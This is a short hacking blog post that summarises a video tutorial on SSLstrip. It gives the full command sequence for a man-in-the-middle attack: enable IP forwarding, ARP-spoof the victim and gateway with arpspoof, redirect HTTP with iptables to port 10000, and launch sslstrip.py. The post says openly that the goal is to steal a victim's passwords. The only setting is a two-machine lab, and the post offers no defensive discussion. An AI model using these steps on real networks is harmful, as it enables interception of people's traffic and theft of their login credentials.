SSLstrip Tutorial


Description: SSLstrip was released by Moxie to demonstrate the vulnerabilities he spoke about at Blackhat 2009. In this video we will look at how to get started with SSLstrip. We setup 2 vmware machines, one running Widnows XP (victim) and the other Backtrack 3 (Attacker). Before we actually begin hacking using SSLstrip, we need to setup the entire Man in the Middle Mechanism and packet redirection / forwarding mechanism. We do this by using the following commands in sequence:

1. Setting up IP Forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

2. ARP MITM attack between Victim and Gateway:

arpspoof -i eth0 -t 192.168.1.6 192.168.1.1

3. Setting up port redirection using Iptables:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

4. Start the SSLstrip tool and make it listen to port 10000 (default anyways)

python sslstrip.py -w secret

Once this setup is up and running perfectly, all of our victim's traffic will be routed through us. In particular, HTTP traffic will be redirected to our port 10000, where SSLstrip is listening. After this we will be able to eavesdrop and steal all of the victim's passwords sent supposedly over "SSL". If you are interested in understanding how the SSLstrip tool actually works, please view the entire presentation video here. You can download the SSLstrip tool here.

watch Additional Video



0 comments:

Never Forget To Say Thanks :D

Copyright © 2013 Hacking Tools and Tech eBooks Collection and Blogger Templates - Anime OST.